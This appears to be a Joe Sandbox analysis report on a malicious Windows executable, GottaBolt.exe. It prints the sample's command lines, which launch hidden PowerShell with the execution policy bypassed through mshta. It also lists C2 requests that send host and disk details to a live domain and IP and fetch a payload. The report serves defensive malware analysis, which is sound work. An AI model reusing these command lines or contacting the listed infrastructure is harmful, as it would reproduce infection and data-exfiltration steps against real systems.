Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GottaBolt.exe

Overview

General Information

Sample name:GottaBolt.exe
Analysis ID:1561030
MD5:981c56e26ae89a9190d1f1db9d2683ce
SHA1:43a46c1736a4f9f5264dab79761b44e2ea0cc18c
SHA256:79b6e63218982c1e85a5e1798c5484e7e034cfecbe9f2da604f668fda8428af4
Tags:exeuser-smica83
Infos:

Detection

Score:69
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Loading BitLocker PowerShell Module
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Wscript Shell Run In CommandLine
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • GottaBolt.exe (PID: 5260 cmdline: "C:\Users\user\Desktop\GottaBolt.exe" MD5: 981C56E26AE89A9190D1F1DB9D2683CE)
    • powershell.exe (PID: 7704 cmdline: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mshta.exe (PID: 7896 cmdline: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 """""" ,0:close") MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 7948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mshta.exe (PID: 7396 cmdline: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 """""" ,0:close") MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 3284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mshta.exe (PID: 5944 cmdline: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 """""" ,0:close") MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 5852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc3.ps1JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: GottaBolt.exe PID: 5260JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 7948JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 7948INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x54fdb9:$b3: ::UTF8.GetString(
        • 0x2565a:$s1: -join
        • 0x27b1e:$s1: -join
        • 0x54cf76:$s1: -join
        • 0x578d23:$s1: -join
        • 0x57c812:$s1: -join
        • 0x57cec4:$s1: -join
        • 0x57ea52:$s1: -join
        • 0x580ebb:$s1: -join
        • 0x5816e2:$s1: -join
        • 0x581f71:$s1: -join
        • 0x5826ac:$s1: -join
        • 0x5826de:$s1: -join
        • 0x582726:$s1: -join
        • 0x582745:$s1: -join
        • 0x582fbb:$s1: -join
        • 0x583137:$s1: -join
        • 0x5831af:$s1: -join
        • 0x583242:$s1: -join
        • 0x5834ba:$s1: -join
        • 0x5856e0:$s1: -join

        Other

        SourceRuleDescriptionAuthorStrings
        amsi64_7948.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: MSHTA Suspicious Execution 01
          Source: Process startedAuthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 """""" ,0:close"), CommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 """""" ,0:close"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 """""" ,0:close"), ProcessId: 7896, ProcessName: mshta.exe
          Sigma detected: Suspicious MSHTA Child Process
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 """""" ,0:close"), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7896, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 ", ProcessId: 7948, ProcessName: powershell.exe
          Sigma detected: Suspicious PowerShell Parameter Substring
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1", CommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GottaBolt.exe", ParentImage: C:\Users\user\Desktop\GottaBolt.exe, ParentProcessId: 5260, ParentProcessName: GottaBolt.exe, ProcessCommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1", ProcessId: 7704, ProcessName: powershell.exe
          Sigma detected: Change PowerShell Policies to an Insecure Level
          Source: Process startedAuthor: frack113: Data: Command: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1", CommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GottaBolt.exe", ParentImage: C:\Users\user\Desktop\GottaBolt.exe, ParentProcessId: 5260, ParentProcessName: GottaBolt.exe, ProcessCommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1", ProcessId: 7704, ProcessName: powershell.exe
          Sigma detected: Wscript Shell Run In CommandLine
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 """""" ,0:close"), CommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 """""" ,0:close"), CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 """""" ,0:close"), ProcessId: 7896, ProcessName: mshta.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1", CommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GottaBolt.exe", ParentImage: C:\Users\user\Desktop\GottaBolt.exe, ParentProcessId: 5260, ParentProcessName: GottaBolt.exe, ProcessCommandLine: "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1", ProcessId: 7704, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-22T17:03:15.452290+010020564911Malware Command and Control Activity Detected192.168.2.74971277.91.73.101443TCP
          2024-11-22T17:03:17.991291+010020564911Malware Command and Control Activity Detected192.168.2.74971477.91.73.101443TCP
          2024-11-22T17:03:20.619296+010020564911Malware Command and Control Activity Detected192.168.2.74972077.91.73.101443TCP
          2024-11-22T17:03:23.142248+010020564911Malware Command and Control Activity Detected192.168.2.74972677.91.73.101443TCP
          2024-11-22T17:03:25.652247+010020564911Malware Command and Control Activity Detected192.168.2.74973577.91.73.101443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-22T17:03:17.991291+010028033053Unknown Traffic192.168.2.74971477.91.73.101443TCP
          2024-11-22T17:03:20.619296+010028033053Unknown Traffic192.168.2.74972077.91.73.101443TCP
          2024-11-22T17:03:23.142248+010028033053Unknown Traffic192.168.2.74972677.91.73.101443TCP
          2024-11-22T17:03:25.652247+010028033053Unknown Traffic192.168.2.74973577.91.73.101443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
          Source: GottaBolt.exeStatic PE information: certificate valid
          Source: unknownHTTPS traffic detected: 77.91.73.101:443 -> 192.168.2.7:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.91.73.101:443 -> 192.168.2.7:49740 version: TLS 1.2
          Source: GottaBolt.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: C:\Users\user\Desktop\NEW-ExpX\orel2\AppMsipPack64-Twitter\AppMSIpack\obj\Release\GottaBolt.pdb source: GottaBolt.exe

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2056491 - Severity 1 - ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET) : 192.168.2.7:49735 -> 77.91.73.101:443
          Source: Network trafficSuricata IDS: 2056491 - Severity 1 - ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET) : 192.168.2.7:49714 -> 77.91.73.101:443
          Source: Network trafficSuricata IDS: 2056491 - Severity 1 - ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET) : 192.168.2.7:49726 -> 77.91.73.101:443
          Source: Network trafficSuricata IDS: 2056491 - Severity 1 - ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET) : 192.168.2.7:49720 -> 77.91.73.101:443
          Source: Network trafficSuricata IDS: 2056491 - Severity 1 - ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET) : 192.168.2.7:49712 -> 77.91.73.101:443
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c7 HTTP/1.1Host: dfssinstitute.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c7 HTTP/1.1Host: dfssinstitute.com
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c7 HTTP/1.1Host: dfssinstitute.com
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c7 HTTP/1.1Host: dfssinstitute.com
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c7 HTTP/1.1Host: dfssinstitute.com
          Source: global trafficHTTP traffic detected: GET /?AyBWQBCcuLOuwrlnujyH=zfHvaMgyXTBAMdfoAHCG.txt HTTP/1.1Host: dfssinstitute.comConnection: Keep-Alive
          Source: Joe Sandbox ViewASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49735 -> 77.91.73.101:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49714 -> 77.91.73.101:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49720 -> 77.91.73.101:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49726 -> 77.91.73.101:443
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: unknownTCP traffic detected without corresponding DNS query: 172.86.76.228
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c7 HTTP/1.1Host: dfssinstitute.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c7 HTTP/1.1Host: dfssinstitute.com
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c7 HTTP/1.1Host: dfssinstitute.com
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c7 HTTP/1.1Host: dfssinstitute.com
          Source: global trafficHTTP traffic detected: GET /?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3dc%7c103%7c01%3a08%7c7 HTTP/1.1Host: dfssinstitute.com
          Source: global trafficHTTP traffic detected: GET /?AyBWQBCcuLOuwrlnujyH=zfHvaMgyXTBAMdfoAHCG.txt HTTP/1.1Host: dfssinstitute.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: dfssinstitute.com
          Source: GottaBolt.exeString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
          Source: GottaBolt.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
          Source: GottaBolt.exe, 00000000.00000002.1522769517.0000026521EDA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1444356293.000001A95442C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
          Source: powershell.exe, 0000000A.00000002.1444356293.000001A95442C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro/pki/crl/productCerAut_2010-06-2
          Source: powershell.exe, 0000000A.00000002.1442957411.000001A954223000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
          Source: GottaBolt.exeString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
          Source: GottaBolt.exeString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
          Source: GottaBolt.exeString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
          Source: GottaBolt.exeString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
          Source: GottaBolt.exe, 00000000.00000002.1510540109.000002650670C000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.00000265066AF000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.0000026506775000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.000002650679E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dfssinstitute.com
          Source: powershell.exe, 0000000A.00000002.1439564457.000001A94C296000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2741137716.00000176176F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2741137716.0000017617574000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664130053.000002AF574D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1572405293.000002AF48DD3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664130053.000002AF57616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: GottaBolt.exeString found in binary or memory: http://ocsps.ssl.com0
          Source: GottaBolt.exeString found in binary or memory: http://ocsps.ssl.com0?
          Source: GottaBolt.exeString found in binary or memory: http://ocsps.ssl.com0P
          Source: powershell.exe, 00000011.00000002.1572405293.000002AF48D79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1572405293.000002AF48A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 0000000A.00000002.1412510517.000001A93C448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: GottaBolt.exe, 00000000.00000002.1510540109.0000026506641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1412510517.000001A93C221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511997234.0000017607501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1572405293.000002AF47461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2167514556.0000015A4E82D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 0000000A.00000002.1412510517.000001A93C448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000011.00000002.1571572984.000002AF4737B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.o_(
          Source: powershell.exe, 00000011.00000002.1572405293.000002AF48A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 00000011.00000002.1572405293.000002AF48D79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1572405293.000002AF48A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: GottaBolt.exeString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
          Source: GottaBolt.exeString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
          Source: powershell.exe, 0000000A.00000002.1412510517.000001A93C221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511997234.0000017607501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1572405293.000002AF47461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2167514556.0000015A4E86D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2167514556.0000015A4E85A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 0000000A.00000002.1412510517.000001A93C448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: powershell.exe, 00000011.00000002.1664130053.000002AF57616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000011.00000002.1664130053.000002AF57616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000011.00000002.1664130053.000002AF57616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: GottaBolt.exe, 00000000.00000002.1510540109.0000026506698000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.0000026506775000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.00000265066A5000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.00000265067C7000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.000002650679E000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.00000265066F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2511997234.0000017607727000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfssinstitute.com
          Source: GottaBolt.exeString found in binary or memory: https://dfssinstitute.com/
          Source: powershell.exe, 0000000E.00000002.2511997234.0000017607727000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfssinstitute.com/?AyBWQBCcuLOuwrlnujyH=zfHvaMgyXTBAMdfoAHCG.txt
